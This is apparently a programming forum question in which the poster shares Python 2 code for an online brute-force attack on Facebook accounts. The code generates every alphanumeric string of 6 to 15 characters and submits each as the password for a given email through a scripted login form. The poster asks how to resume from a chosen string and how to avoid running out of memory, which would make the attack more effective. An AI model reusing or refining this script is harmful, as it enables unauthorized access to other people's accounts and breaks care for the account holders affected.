So I have been using Itertools
in python to make a brute forcing application of sorts. I have managed to get the code working fine and it works perfectly returning all the incorrect answers untill it get's the correct answer..
But I keep reaching a point in my application when it say's there is not enough memory?:s
My code is simple, it imports ascii - lowercase and uppercase from the strings
module and it imports product from Itertools
and uses 3 for loops, looping through all the chars defined
But it keeps saying there is not enough memory.. if I was to hazard a guess it is due to the amount of RAM I have (4GB) and it not being able to store enough to the Memory, but once it has looped one result why does it not remove that from the memory?
The code is:
chars = ascii_lowercase + ascii_uppercase + digits
state = False
for i in range(6, 16):
if state: break
try:
for x in product(chars, repeat=i):
tmp = ""
try:
for z in x:
tmp += z
print tmp
if login(tmp):
state = True
break
except Exception as e:
print e
raw_input("An Error has occured.\nFix the issue and press enter to continue.")
except Exception as e:
print e
raw_input("An Error has occured.\nFix the issue and press enter to continue.")
the first loop is just for the amount of characters in each string it tests the second loop uses product to loop through characters and iterate through everything so it goes a, b - aa, ab - aaa, aab and so forth and the third loop is because the answers are returned in a tuple and i use that to convert it to a string
The state variable is so that it does not continue looping after it has found a result and you can probably understand the rest. Except the Try/Except statements, they are just so you don't have to restart every time there is an error giving you a chance to fix it.
My question now is:
Is there any way to use itertools product to start from a point eg it usually starting at a but i want it to start at cB1o or what ever else
Or
Is there any way to stop my memory filling up (remove the used values from the memory)?
Edit
def login (psw):
global url
op.open(url)
op.select_form(nr=0)
op.form["email"] = email
op.form["pass"] = psw
op.submit()
if op.title() == "Facebook":
return True
else:
return False
email is the user's input
login
function look like?